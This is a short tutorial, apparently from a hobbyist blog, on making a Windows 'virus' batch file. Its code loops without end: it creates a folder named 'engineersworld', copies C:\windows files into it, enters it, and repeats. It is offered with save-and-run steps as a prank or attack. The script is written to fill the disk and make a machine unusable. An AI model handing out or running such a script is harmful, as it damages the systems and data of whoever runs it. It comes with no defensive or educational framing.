1.Create a virus to make folder into a folder and so on...
2.Create an invisible folder
__________________________________________________________________________________________________
To create such a virus there is just a need of few line coding,follow the below steps:
1.Open notepad and type the following code
:123
mkdir engineersworld
copy C:\windows\*.*engineersworld\*.*
cd engineersworld
goto 123
3.now save as to virus .bat on desktop.
4.And thats your virus....
5.For much advancement in this refer to our previous post.